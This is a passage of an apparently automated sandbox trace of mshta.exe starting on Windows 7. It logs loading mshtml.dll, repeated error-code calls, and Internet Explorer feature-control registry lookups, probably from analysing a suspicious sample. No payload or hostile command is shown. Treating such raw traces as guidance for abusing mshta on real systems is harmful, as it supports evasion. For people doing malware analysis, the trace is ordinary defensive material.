\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256
[0067.211] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xff9da700, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.211] GetLastError () returned 0x0
[0067.211] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.212] GetLastError () returned 0x0
[0067.212] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.213] GetLastError () returned 0x0
[0067.213] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.214] GetLastError () returned 0x0
[0067.214] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.215] GetLastError () returned 0x0
[0067.215] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.216] SetLastError (dwErrCode=0x0)
[0067.216] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.217] SetLastError (dwErrCode=0x0)
[0067.217] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9d2cc4) returned 0x0
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.218] SetLastError (dwErrCode=0x0)
[0067.218] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetLastError () returned 0x0
[0067.219] SetLastError (dwErrCode=0x0)
[0067.219] GetVersion () returned 0x1db10106
[0067.219] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x776e0000
[0067.220] GetProcAddress (hModule=0x776e0000, lpProcName="HeapSetInformation") returned 0x776fc4a0
[0067.220] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0067.220] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x20fd48 | out: phkResult=0x20fd48*=0x2a) returned 0x0
[0067.220] RegQueryValueExA (in: hKey=0x2a, lpValueName=0x0, lpReserved=0x0, lpType=0x20fd40, lpData=0x6c5d40, lpcbData=0x20fd44*=0x105 | out: lpType=0x20fd40*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x20fd44*=0x1f) returned 0x0
[0067.220] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x7fee0880000
[0067.324] HeapSetInformation (HeapHandle=0x240000, HeapInformationClass=0x0, HeapInformation=0x20f788, HeapInformationLength=0x4) returned 1
[0067.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f750 | out: lpSystemTimeAsFileTime=0x20f750*(dwLowDateTime=0xd81395f0, dwHighDateTime=0x1d34cee))
[0067.324] GetCurrentProcessId () returned 0x370
[0067.324] GetCurrentThreadId () returned 0x628
[0067.324] GetTickCount () returned 0x20157
[0067.324] QueryPerformanceCounter (in: lpPerformanceCount=0x20f758 | out: lpPerformanceCount=0x20f758*=494204737) returned 1
[0067.324] GetVersionExA (in: lpVersionInformation=0x20f4b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20f4b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.324] __dllonexit () returned 0x7fee094a28c
[0067.324] __dllonexit () returned 0x7fee094e5b4
[0067.324] __dllonexit () returned 0x7fee0944de0
[0067.324] __dllonexit () returned 0x7fee0944e0c
[0067.324] __dllonexit () returned 0x7fee09478c0
[0067.324] __dllonexit () returned 0x7fee0949f60
[0067.324] __dllonexit () returned 0x7fee0944dac
[0067.324] __dllonexit () returned 0x7fee094a204
[0067.325] __dllonexit () returned 0x7fee0944dc0
[0067.325] __dllonexit () returned 0x7fee09445c0
[0067.325] __dllonexit () returned 0x7fee09445d0
[0067.325] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0067.325] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc193
[0067.325] __dllonexit () returned 0x7fee0944600
[0067.325] __dllonexit () returned 0x7fee0944630
[0067.325] __dllonexit () returned 0x7fee0944670
[0067.325] __dllonexit () returned 0x7fee0944690
[0067.325] __dllonexit () returned 0x7fee09446c0
[0067.325] __dllonexit () returned 0x7fee0949fd0
[0067.325] __dllonexit () returned 0x7fee09446e0
[0067.325] __dllonexit () returned 0x7fee0944700
[0067.325] __dllonexit () returned 0x7fee0944720
[0067.325] __dllonexit () returned 0x7fee0944740
[0067.325] __dllonexit () returned 0x7fee0944760
[0067.325] __dllonexit () returned 0x7fee094a000
[0067.325] __dllonexit () returned 0x7fee0944780
[0067.325] __dllonexit () returned 0x7fee09447a0
[0067.325] __dllonexit () returned 0x7fee09447d0
[0067.326] __dllonexit () returned 0x7fee09447f0
[0067.326] __dllonexit () returned 0x7fee0944810
[0067.326] __dllonexit () returned 0x7fee0944830
[0067.326] __dllonexit () returned 0x7fee0944850
[0067.326] __dllonexit () returned 0x7fee0944870
[0067.326] __dllonexit () returned 0x7fee0944890
[0067.326] __dllonexit () returned 0x7fee09448b0
[0067.326] __dllonexit () returned 0x7fee09448d0
[0067.326] __dllonexit () returned 0x7fee09448f0
[0067.326] __dllonexit () returned 0x7fee0944910
[0067.326] __dllonexit () returned 0x7fee0944930
[0067.326] __dllonexit () returned 0x7fee0944950
[0067.326] __dllonexit () returned 0x7fee0944970
[0067.326] __dllonexit () returned 0x7fee0944990
[0067.326] __dllonexit () returned 0x7fee09449b0
[0067.326] __dllonexit () returned 0x7fee09449d0
[0067.326] __dllonexit () returned 0x7fee09449f0
[0067.326] __dllonexit () returned 0x7fee0944a10
[0067.326] __dllonexit () returned 0x7fee0944a40
[0067.326] __dllonexit () returned 0x7fee0944a70
[0067.327] __dllonexit () returned 0x7fee0944aa0
[0067.327] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0067.327] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0067.327] __dllonexit () returned 0x7fee0944ab0
[0067.327] __dllonexit () returned 0x7fee094a0d0
[0067.327] __dllonexit () returned 0x7fee0944ae0
[0067.327] __dllonexit () returned 0x7fee0944af0
[0067.327] __dllonexit () returned 0x7fee0944b10
[0067.327] __dllonexit () returned 0x7fee0944b30
[0067.327] __dllonexit () returned 0x7fee094a100
[0067.327] __dllonexit () returned 0x7fee0944b50
[0067.327] __dllonexit () returned 0x7fee0944b70
[0067.327] __dllonexit () returned 0x7fee0944b90
[0067.327] __dllonexit () returned 0x7fee0944bb0
[0067.327] __dllonexit () returned 0x7fee0944bd0
[0067.327] __dllonexit () returned 0x7fee0944bf0
[0067.328] __dllonexit () returned 0x7fee0944c10
[0067.328] __dllonexit () returned 0x7fee0944c30
[0067.328] __dllonexit () returned 0x7fee0944c50
[0067.328] __dllonexit () returned 0x7fee0944c70
[0067.328] __dllonexit () returned 0x7fee0944c90
[0067.328] __dllonexit () returned 0x7fee0944cb0
[0067.328] __dllonexit () returned 0x7fee0944cd0
[0067.328] __dllonexit () returned 0x7fee094e500
[0067.328] __dllonexit () returned 0x7fee0944cf0
[0067.328] __dllonexit () returned 0x7fee094a150
[0067.328] __dllonexit () returned 0x7fee094a190
[0067.328] __dllonexit () returned 0x7fee0944d1c
[0067.328] __dllonexit () returned 0x7fee0944d3c
[0067.328] __dllonexit () returned 0x7fee0944d50
[0067.328] GetCurrentThreadId () returned 0x628
[0067.328] CoCreateGuid (in: pguid=0x7fee10449d0 | out: pguid=0x7fee10449d0*(Data1=0x356d0b04, Data2=0xc5e, Data3=0x4b94, Data4=([0]=0xbb, [1]=0xa3, [2]=0x3e, [3]=0x99, [4]=0x37, [5]=0xc8, [6]=0x7f, [7]=0xc2))) returned 0x0
[0067.331] __dllonexit () returned 0x7fee094a1b8
[0067.331] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20ee60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.331] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0067.331] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4
[0067.331] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8
[0067.331] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x26a8c0
[0067.331] SHRegGetValueW () returned 0x2
[0067.331] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0e8 | out: phkResult=0x20f0e8*=0x0) returned 0x2
[0067.331] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f0 | out: phkResult=0x20f0f0*=0x0) returned 0x2
[0067.331] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.331] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.331] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.331] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.331] RegCloseKey (hKey=0x0) returned 0x6
[0067.331] RegCloseKey (hKey=0x0) returned 0x6
[0067.331] RegCloseKey (hKey=0x78) returned 0x0
[0067.331] RegCloseKey (hKey=0x7c) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.332] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x7c) returned 0x0
[0067.332] RegCloseKey (hKey=0x78) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
